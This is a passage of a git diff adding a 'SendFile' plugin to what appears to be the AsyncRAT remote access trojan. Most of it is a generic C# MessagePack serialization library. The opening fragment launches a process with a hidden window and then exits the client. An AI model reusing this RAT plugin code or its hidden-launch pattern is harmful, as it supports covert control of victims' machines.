+ WindowStyle = ProcessWindowStyle.Hidden
+ });
+
+ Methods.ClientExit();
+ Environment.Exit(0);
+
+ }
+ }
+
+}
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/BytesTools.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/BytesTools.cs
new file mode 100644
index 0000000..bd66e46
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/BytesTools.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public class BytesTools
+ {
+ static UTF8Encoding utf8Encode = new UTF8Encoding();
+
+ public static byte[] GetUtf8Bytes(String s)
+ {
+
+ return utf8Encode.GetBytes(s);
+ }
+
+ public static String GetString(byte[] utf8Bytes)
+ {
+ return utf8Encode.GetString(utf8Bytes);
+ }
+
+ public static String BytesAsString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:D3} ", b));
+ }
+ return sb.ToString();
+ }
+
+
+ public static String BytesAsHexString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:X2} ", b));
+ }
+ return sb.ToString();
+ }
+
+ ///
+ /// 交换byte数组数据
+ /// 可用于高低数据交换
+ ///
+ /// 要交换的byte数组
+ /// 返回交换后的数据
+ public static byte[] SwapBytes(byte[] v)
+ {
+ byte[] r = new byte[v.Length];
+ int j = v.Length - 1;
+ for (int i = 0; i < r.Length; i++)
+ {
+ r[i] = v[j];
+ j--;
+ }
+ return r;
+ }
+
+ public static byte[] SwapInt64(Int64 v)
+ {
+ //byte[] r = new byte[8];
+ //r[7] = (byte)v;
+ //r[6] = (byte)(v >> 8);
+ //r[5] = (byte)(v >> 16);
+ //r[4] = (byte)(v >> 24);
+ //r[3] = (byte)(v >> 32);
+ //r[2] = (byte)(v >> 40);
+ //r[1] = (byte)(v >> 48);
+ //r[0] = (byte)(v >> 56);
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ public static byte[] SwapInt32(Int32 v)
+ {
+ byte[] r = new byte[4];
+ r[3] = (byte)v;
+ r[2] = (byte)(v >> 8);
+ r[1] = (byte)(v >> 16);
+ r[0] = (byte)(v >> 24);
+ return r;
+ }
+
+
+ public static byte[] SwapInt16(Int16 v)
+ {
+ byte[] r = new byte[2];
+ r[1] = (byte)v;
+ r[0] = (byte)(v >> 8);
+ return r;
+ }
+
+ public static byte[] SwapDouble(Double v)
+ {
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPack.cs
new file mode 100644
index 0000000..131eb37
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPack.cs
@@ -0,0 +1,926 @@
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+
+namespace Plugin.MessagePack
+{
+ public class MsgPackEnum : IEnumerator
+ {
+ List children;
+ int position = -1;
+
+ public MsgPackEnum(List obj)
+ {
+ children = obj;
+ }
+ object IEnumerator.Current
+ {
+ get { return children[position]; }
+ }
+
+ bool IEnumerator.MoveNext()
+ {
+ position++;
+ return (position < children.Count);
+ }
+
+ void IEnumerator.Reset()
+ {
+ position = -1;
+ }
+
+ }
+
+ public class MsgPackArray
+ {
+ List children;
+ MsgPack owner;
+
+ public MsgPackArray(MsgPack msgpackObj, List listObj)
+ {
+ owner = msgpackObj;
+ children = listObj;
+ }
+
+ public MsgPack Add()
+ {
+ return owner.AddArrayChild();
+ }
+
+ public MsgPack Add(String value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.AsString = value;
+ return obj;
+ }
+
+ public MsgPack Add(Int64 value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsInteger(value);
+ return obj;
+ }
+
+ public MsgPack Add(Double value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsFloat(value);
+ return obj;
+ }
+
+ public MsgPack this[int index]
+ {
+ get { return children[index]; }
+ }
+
+ public int Length
+ {
+ get { return children.Count; }
+ }
+ }
+
+ public class MsgPack : IEnumerable
+ {
+ string name;
+ string lowerName;
+ object innerValue;
+ MsgPackType valueType;
+ MsgPack parent;
+ List children = new List();
+ MsgPackArray refAsArray = null;
+
+ private void SetName(string value)
+ {
+ this.name = value;
+ this.lowerName = name.ToLower();
+ }
+
+ private void Clear()
+ {
+ for (int i = 0; i < children.Count; i++)
+ {
+ ((MsgPack)children[i]).Clear();
+ }
+ children.Clear();
+ }
+
+ private MsgPack InnerAdd()
+ {
+ MsgPack r = new MsgPack();
+ r.parent = this;
+ this.children.Add(r);
+ return r;
+ }
+
+ private int IndexOf(string name)
+ {
+ int i = -1;
+ int r = -1;
+
+ string tmp = name.ToLower();
+ foreach (MsgPack item in children)
+ {
+ i++;
+ if (tmp.Equals(item.lowerName))
+ {
+ r = i;
+ break;
+ }
+ }
+ return r;
+ }
+
+ public MsgPack FindObject(string name)
+ {
+ int i = IndexOf(name);
+ if (i == -1)
+ {
+ return null;
+ }
+ else
+ {
+ return this.children[i];
+ }
+ }
+
+
+ private MsgPack InnerAddMapChild()
+ {
+ if (valueType != MsgPackType.Map)
+ {
+ Clear();
+ this.valueType = MsgPackType.Map;
+ }
+ return InnerAdd();
+ }
+
+ private MsgPack InnerAddArrayChild()
+ {
+ if (valueType != MsgPackType.Array)
+ {
+ Clear();
+ this.valueType = MsgPackType.Array;
+ }
+ return InnerAdd();
+ }
+
+ public MsgPack AddArrayChild()
+ {
+ return InnerAddArrayChild();
+ }
+
+ private void WriteMap(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x80 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDE;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDF;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+ for (int i = 0; i < len; i++)
+ {
+ WriteTools.WriteString(ms, children[i].name);
+ children[i].Encode2Stream(ms);
+ }
+ }
+
+ private void WirteArray(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x90 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDC;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDD;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+
+ for (int i = 0; i < len; i++)
+ {
+ ((MsgPack)children[i]).Encode2Stream(ms);
+ }
+ }
+
+ public void SetAsInteger(Int64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Integer;
+ }
+
+ public void SetAsUInt64(UInt64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.UInt64;
+ }
+
+ public UInt64 GetAsUInt64()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToUInt64((Int64)this.innerValue);
+ case MsgPackType.UInt64:
+ return (UInt64)this.innerValue;
+ case MsgPackType.String:
+ return UInt64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToUInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToUInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToUInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+
+ }
+
+ public Int64 GetAsInteger()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return (Int64)this.innerValue;
+ case MsgPackType.UInt64:
+ return Convert.ToInt64((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Int64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+ public Double GetAsFloat()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToDouble((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Double.Parse((String)this.innerValue);
+ case MsgPackType.Float:
+ return (Double)this.innerValue;
+ case MsgPackType.Single:
+ return (Single)this.innerValue;
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+
+ public void SetAsBytes(byte[] value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Binary;
+ }
+
+ public byte[] GetAsBytes()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return BitConverter.GetBytes((Int64)this.innerValue);
+ case MsgPackType.String:
+ return BytesTools.GetUtf8Bytes(this.innerValue.ToString());
+ case MsgPackType.Float:
+ return BitConverter.GetBytes((Double)this.innerValue);
+ case MsgPackType.Single:
+ return BitConverter.GetBytes((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ long dateval = ((DateTime)this.innerValue).ToBinary();
+ return BitConverter.GetBytes(dateval);
+ case MsgPackType.Binary:
+ return (byte[])this.innerValue;
+ default:
+ return new byte[] { };
+ }
+ }
+
+ public void Add(string key, String value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsString(value);
+ }
+
+ public void Add(string key, int value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsInteger(value);
+ }
+
+ public bool LoadFileAsBytes(string fileName)
+ {
+ if (File.Exists(fileName))
+ {
+ byte[] value = null;
+ FileStream fs = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.Read);
+ value = new byte[fs.Length];
+ fs.Read(value, 0, (int)fs.Length);
+ fs.Close();
+ fs.Dispose();
+ SetAsBytes(value);
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+
+ }
+
+ public bool SaveBytesToFile(string fileName)
+ {
+ if (this.innerValue != null)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Append);
+ fs.Write(((byte[])this.innerValue), 0, ((byte[])this.innerValue).Length);
+ fs.Close();
+ fs.Dispose();
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+ }
+
+ public MsgPack ForcePathObject(string path)
+ {
+ MsgPack tmpParent, tmpObject;
+ tmpParent = this;
+ string[] pathList = path.Trim().Split(new Char[] { '.', '/', '\\' });
+ string tmp = null;
+ if (pathList.Length == 0)
+ {
+ return null;
+ }
+ else if (pathList.Length > 1)
+ {
+ for (int i = 0; i < pathList.Length - 1; i++)
+ {
+ tmp = pathList[i];
+ tmpObject = tmpParent.FindObject(tmp);
+ if (tmpObject == null)
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ }
+ else
+ {
+ tmpParent = tmpObject;
+ }
+ }
+ }
+ tmp = pathList[pathList.Length - 1];
+ int j = tmpParent.IndexOf(tmp);
+ if (j > -1)
+ {
+ return tmpParent.children[j];
+ }
+ else
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ return tmpParent;
+ }
+ }
+
+ public void SetAsNull()
+ {
+ Clear();
+ this.innerValue = null;
+ this.valueType = MsgPackType.Null;
+ }
+
+ public void SetAsString(String value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.String;
+ }
+
+ public String GetAsString()
+ {
+ if (this.innerValue == null)
+ {
+ return "";
+ }
+ else
+ {
+ return this.innerValue.ToString();
+ }
+
+ }
+
+ public void SetAsBoolean(Boolean bVal)
+ {
+ this.valueType = MsgPackType.Boolean;
+ this.innerValue = bVal;
+ }
+
+ public void SetAsSingle(Single fVal)
+ {
+ this.valueType = MsgPackType.Single;
+ this.innerValue = fVal;
+ }
+
+ public void SetAsFloat(Double fVal)
+ {
+ this.valueType = MsgPackType.Float;
+ this.innerValue = fVal;
+ }
+
+
+
+ public void DecodeFromBytes(byte[] bytes)
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ ms.Write(bytes, 0, bytes.Length);
+ ms.Position = 0;
+ DecodeFromStream(ms);
+ }
+ }
+
+ public void DecodeFromFile(string fileName)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Open);
+ DecodeFromStream(fs);
+ fs.Dispose();
+ }
+
+
+
+ public void DecodeFromStream(Stream ms)
+ {
+ byte lvByte = (byte)ms.ReadByte();
+ byte[] rawByte = null;
+ MsgPack msgPack = null;
+ int len = 0;
+ int i = 0;
+
+ if (lvByte <= 0x7F)
+ { //positive fixint 0xxxxxxx 0x00 - 0x7f
+ SetAsInteger(lvByte);
+ }
+ else if ((lvByte >= 0x80) && (lvByte <= 0x8F))
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ len = lvByte - 0x80;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0x90) && (lvByte <= 0x9F)) //fixarray 1001xxxx 0x90 - 0x9f
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ len = lvByte - 0x90;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0xA0) && (lvByte <= 0xBF)) // fixstr 101xxxxx 0xa0 - 0xbf
+ {
+ len = lvByte - 0xA0;
+ SetAsString(ReadTools.ReadString(ms, len));
+ }
+ else if ((lvByte >= 0xE0) && (lvByte <= 0xFF))
+ { /// -1..-32
+ // negative fixnum stores 5-bit negative integer
+ // +--------+
+ // |111YYYYY|
+ // +--------+
+ SetAsInteger((sbyte)lvByte);
+ }
+ else if (lvByte == 0xC0)
+ {
+ SetAsNull();
+ }
+ else if (lvByte == 0xC1)
+ {
+ throw new Exception("(never used) type $c1");
+ }
+ else if (lvByte == 0xC2)
+ {
+ SetAsBoolean(false);
+ }
+ else if (lvByte == 0xC3)
+ {
+ SetAsBoolean(true);
+ }
+ else if (lvByte == 0xC4)
+ { // max 255
+ len = ms.ReadByte();
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC5)
+ { // max 65535
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToUInt16(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC6)
+ { // binary max: 2^32-1
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if ((lvByte == 0xC7) || (lvByte == 0xC8) || (lvByte == 0xC9))
+ {
+ throw new Exception("(ext8,ext16,ex32) type $c7,$c8,$c9");
+ }
+ else if (lvByte == 0xCA)
+ { // float 32
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+
+ SetAsSingle(BitConverter.ToSingle(rawByte, 0));
+ }
+ else if (lvByte == 0xCB)
+ { // float 64
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsFloat(BitConverter.ToDouble(rawByte, 0));
+ }
+ else if (lvByte == 0xCC)
+ { // uint8
+ // uint 8 stores a 8-bit unsigned integer
+ // +--------+--------+
+ // | 0xcc |ZZZZZZZZ|
+ // +--------+--------+
+ lvByte = (byte)ms.ReadByte();
+ SetAsInteger(lvByte);
+ }
+ else if (lvByte == 0xCD)
+ { // uint16
+ // uint 16 stores a 16-bit big-endian unsigned integer
+ // +--------+--------+--------+
+ // | 0xcd |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xCE)
+ {
+ // uint 32 stores a 32-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xce |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xCF)
+ {
+ // uint 64 stores a 64-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xcf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsUInt64(BitConverter.ToUInt64(rawByte, 0));
+ }
+ else if (lvByte == 0xDC)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdc |YYYYYYYY|YYYYYYYY| N objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDD)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdd |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xD9)
+ {
+ // str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ // +--------+--------+========+
+ // | 0xd9 |YYYYYYYY| data |
+ // +--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDF)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N*2 objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDA)
+ {
+ // str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ // +--------+--------+--------+========+
+ // | 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ // +--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDB)
+ {
+ // str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ // +--------+--------+--------+--------+--------+========+
+ // | 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ // +--------+--------+--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xD0)
+ {
+ // int 8 stores a 8-bit signed integer
+ // +--------+--------+
+ // | 0xd0 |ZZZZZZZZ|
+ // +--------+--------+
+ SetAsInteger((sbyte)ms.ReadByte());
+ }
+ else if (lvByte == 0xD1)
+ {
+ // int 16 stores a 16-bit big-endian signed integer
+ // +--------+--------+--------+
+ // | 0xd1 |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xD2)
+ {
+ // int 32 stores a 32-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xd2 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xD3)
+ {
+ // int 64 stores a 64-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xd3 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt64(rawByte, 0));
+ }
+ }
+
+ public byte[] Encode2Bytes()
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ Encode2Stream(ms);
+ byte[] r = new byte[ms.Length];
+ ms.Position = 0;
+ ms.Read(r, 0, (int)ms.Length);
+ return r;
+ }
+ }
+
+ public void Encode2Stream(Stream ms)
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Unknown:
+ case MsgPackType.Null:
+ WriteTools.WriteNull(ms);
+ break;
+ case MsgPackType.String:
+ WriteTools.WriteString(ms, (String)this.innerValue);
+ break;
+ case MsgPackType.Integer:
+ WriteTools.WriteInteger(ms, (Int64)this.innerValue);
+ break;
+ case MsgPackType.UInt64:
+ WriteTools.WriteUInt64(ms, (UInt64)this.innerValue);
+ break;
+ case MsgPackType.Boolean:
+ WriteTools.WriteBoolean(ms, (Boolean)this.innerValue);
+ break;
+ case MsgPackType.Float:
+ WriteTools.WriteFloat(ms, (Double)this.innerValue);
+ break;
+ case MsgPackType.Single:
+ WriteTools.WriteFloat(ms, (Single)this.innerValue);
+ break;
+ case MsgPackType.DateTime:
+ WriteTools.WriteInteger(ms, GetAsInteger());
+ break;
+ case MsgPackType.Binary:
+ WriteTools.WriteBinary(ms, (byte[])this.innerValue);
+ break;
+ case MsgPackType.Map:
+ WriteMap(ms);
+ break;
+ case MsgPackType.Array:
+ WirteArray(ms);
+ break;
+ default:
+ WriteTools.WriteNull(ms);
+ break;
+ }
+ }
+
+ public String AsString
+ {
+ get
+ {
+ return GetAsString();
+ }
+ set
+ {
+ SetAsString(value);
+ }
+ }
+
+ public Int64 AsInteger
+ {
+ get { return GetAsInteger(); }
+ set { SetAsInteger((Int64)value); }
+ }
+
+ public Double AsFloat
+ {
+ get { return GetAsFloat(); }
+ set { SetAsFloat(value); }
+ }
+ public MsgPackArray AsArray
+ {
+ get
+ {
+ lock (this)
+ {
+ if (refAsArray == null)
+ {
+ refAsArray = new MsgPackArray(this, children);
+ }
+ }
+ return refAsArray;
+ }
+ }
+
+
+ public MsgPackType ValueType
+ {
+ get { return valueType; }
+ }
+
+
+ IEnumerator IEnumerable.GetEnumerator()
+ {
+ return new MsgPackEnum(children);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPackType.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPackType.cs
new file mode 100644
index 0000000..2567ae6
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/MsgPackType.cs
@@ -0,0 +1,24 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public enum MsgPackType
+ {
+ Unknown = 0,
+ Null = 1,
+ Map = 2,
+ Array = 3,
+ String = 4,
+ Integer = 5,
+ UInt64 = 6,
+ Boolean = 7,
+ Float = 8,
+ Single = 9,
+ DateTime = 10,
+ Binary = 11
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/ReadTools.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/ReadTools.cs
new file mode 100644
index 0000000..9e85968
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/MessagePack/ReadTools.cs
@@ -0,0 +1,84 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ class ReadTools
+ {
+ public static String ReadString(Stream ms, int len)
+ {
+ byte[] rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+
+ public static String ReadString(Stream ms)
+ {
+ byte strFlag = (byte)ms.ReadByte();
+ return ReadString(strFlag, ms);
+ }
+
+ public static String ReadString(byte strFlag, Stream ms)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = null;
+ int len = 0;
+ if ((strFlag >= 0xA0) && (strFlag <= 0xBF))
+ {
+ len = strFlag - 0xA0;
+ }
+ else if (strFlag == 0xD9)
+ {
+ len = ms.ReadByte();
+ }
+ else if (strFlag == 0xDA)
+ {
+ rawBytes = new byte[2];
+ ms.Read(rawBytes, 0, 2);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
